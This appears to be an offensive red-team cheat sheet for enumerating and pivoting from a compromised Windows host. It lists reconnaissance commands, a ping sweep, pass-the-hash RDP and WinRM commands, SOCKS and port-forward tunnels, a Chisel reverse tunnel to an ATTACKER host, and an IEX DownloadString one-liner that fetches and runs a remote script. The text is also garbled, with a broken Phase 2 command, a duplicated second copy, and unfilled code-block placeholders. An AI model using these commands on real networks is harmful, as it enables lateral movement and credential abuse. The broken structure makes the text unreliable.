Windows Internal Device Scan

────────────────────────

Phase 1 – 100% Passive (0 network noise)

# 1. Interfaces + IPs (cleanest view)
ipconfig /all
Get-NetIPConfiguration | Select InterfaceAlias,IPv4Address,InterfaceDescription

# 2. Routing table – this is pure gold (most hidden internal networks live here)
route print
Get-NetRoute -AddressFamily IPv4 | Sort DestinationPrefix | ft -AutoSize

# 3. ARP cache = live hosts the box already knows (zero packets sent)
arp -a
Get-NetNeighbor -AddressFamily IPv4 | Where State -ne Incomplete | ft -AutoSize

# 4. Local hosts file + DNS servers
type C:\Windows\System32\drivers\etc\hosts
Get-DnsClientServerAddress -AddressFamily IPv4

Instant TL;DR one-liner (run this first 10 seconds):

clear; "=== IPs ==="; ipconfig | findstr "IPv4"; "=== Routes ==="; route print | findstr " 0.0.0.0  10.  172.  192."; "=== ARP (live hosts) ==="; arp -a | findstr "dynamic"; "=== DNS ==="; Get-DnsClientServerAddress -AddressFamily IPv4 | ft -Wrap

────────────────────────

Phase 2 – Low-Noise Active Discovery

# Quietly ping-sweep every directly connected subnet and refresh ARP cache
$subnets = (Get-NetRoute | ? DestinationPrefix -like "*/*" | % {$_.DestinationPrefix.Split('/')[0] -replace '\.\d+

────────────────────────
###  Phase 3 – Hidden Networks & Tunnels (Windows loves these)

```powershell
# Hyper-V / VMware / Virtual adapters (often have separate internal nets)
Get-NetAdapter | Where InterfaceDescription -Match "Hyper-V|VMware|VirtualBox|VPN" | ft Name,Status,InterfaceDescription

# WireGuard / OpenVPN / Tailscale / ZeroTier / Nebula
Get-Process -Name "wireguard*","openvpn*","tailscale*","zerotier*","nebula*" -ErrorAction SilentlyContinue
Get-Service wg*,tailscaled,zerotier* -ErrorAction SilentlyContinue | ft

# Azure / AWS / GCP virtual adapters (common in cloud)
Get-NetAdapter | ? Name -like "Ethernet 2","vEthernet*"

# Windows VPN connections – show configured internal routes
Get-VpnConnection | ft Name,ServerAddress,SplitTunneling,AllUserConnection

────────────────────────

Phase 4 – Firewall Rules & What You Can Actually Reach

# Quick outbound allows (most admins leave this wide open internally)
netsh advfirewall firewall show rule name=all | findstr /i "Action.*Allow.*Destination" | findstr /i "10. 172. 192."

# Full export (if you have local admin)
netsh advfirewall export "C:\windows\temp\fw.wfw"
Get-NetFirewallRule | Where {$_.Enabled -eq True -and $_.Direction -eq "Outbound"} | ft DisplayName,Action,Profile -AutoSize

────────────────────────

Phase 5 – Listening Ports = Pivot Capability FROM This Box

# External listeners (anything can connect in)
Get-NetTCPConnection -State Listen | Where LocalAddress -notmatch "127.0.0.1|::1|0.0.0.0" | ft LocalAddress,LocalPort,State,OwningProcess

# Local-only services (perfect for port forwarding)
Get-NetTCPConnection -State Listen | Where LocalAddress -match "127.0.0.1|::1" | ft LocalAddress,LocalPort,OwningProcess

# Bonus: translate process IDs to names
netstat -ano | findstr LISTENING

────────────────────────

Instant Pivot Techniques (from YOUR attacker box)

Goal	Command (run from Kali/attacker)
SOCKS proxy (full network)	`ssh -D 1080 administrator@TARGET` or use Covenant/Beacon SOCKS
RDP through pivot	`xfreerdp /v:TARGET /u:admin /pth:HASH +/dynamic-resolution`
WinRM through pivot	`evil-winrm -i TARGET -u admin -H HASH`
Port forward one service	`ssh -L 3389:10.10.5.50:3389 administrator@PIVOT`
Full subnet tunnel	Ligolo-ng, Chisel, sshuttle -r admin@PIVOT 10.10.0.0/16
Fastest reverse tunnel	Chisel: `chisel server -p 9000 --reverse` → `chisel client ATTACKER:9000 R:1080:socks`

────────────────────────

ONE-LINER TO RULE THEM ALL (drop & run immediately)

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/yourhandle/winpivot/main/run.ps1')

(Or paste this if you can’t reach GitHub:)

clear; hostname; "IPs"; ipconfig | sls "IPv4"; "Routes"; route print | sls " 0.0.0.0| 10\.| 172\.1[6-9]\.| 172\.2[0-9]\.| 172\.3[0-1]\.| 192\.168\."; "Live hosts"; arp -a; "Listening ports"; netstat -ano | sls LISTEN

───────────────

#RedTeam #Pentest #Windows #Pivoting #OffensiveSecurity,'.'})
foreach($s in $subnets){1..254 | % {Start-Job -ScriptBlock {ping -n 1 -w 200 "$ using:s $_{"} >$ null} | Out-Null}}
Start-Sleep -s 6; "Updated ARP cache:"; arp -a


────────────────────────
###  Phase 3 – Hidden Networks & Tunnels (Windows loves these)

{{CODE_BLOCK_3}}

────────────────────────
### Phase 4 – Firewall Rules & What You Can Actually Reach

{{CODE_BLOCK_4}}

────────────────────────
### Phase 5 – Listening Ports = Pivot Capability FROM This Box

{{CODE_BLOCK_5}}

────────────────────────
### Instant Pivot Techniques (from YOUR attacker box)

| Goal                          | Command (run from Kali/attacker)                                      |
|-------------------------------|-----------------------------------------------------------------------|
| SOCKS proxy (full network)    | `ssh -D 1080 administrator@TARGET` or use Covenant/Beacon SOCKS     |
| RDP through pivot             | `xfreerdp /v:TARGET /u:admin /pth:HASH +/dynamic-resolution`        |
| WinRM through pivot           | `evil-winrm -i TARGET -u admin -H HASH`                              |
| Port forward one service      | `ssh -L 3389:10.10.5.50:3389 administrator@PIVOT`                    |
| Full subnet tunnel            | **Ligolo-ng**, **Chisel**, **sshuttle -r admin@PIVOT 10.10.0.0/16** |
| Fastest reverse tunnel        | Chisel: `chisel server -p 9000 --reverse` → `chisel client ATTACKER:9000 R:1080:socks` |

────────────────────────
### ONE-LINER TO RULE THEM ALL (drop & run immediately)

{{CODE_BLOCK_6}}

(Or paste this if you can’t reach GitHub:)
{{CODE_BLOCK_7}}

───────────────

#RedTeam #Pentest #Windows #Pivoting #OffensiveSecurity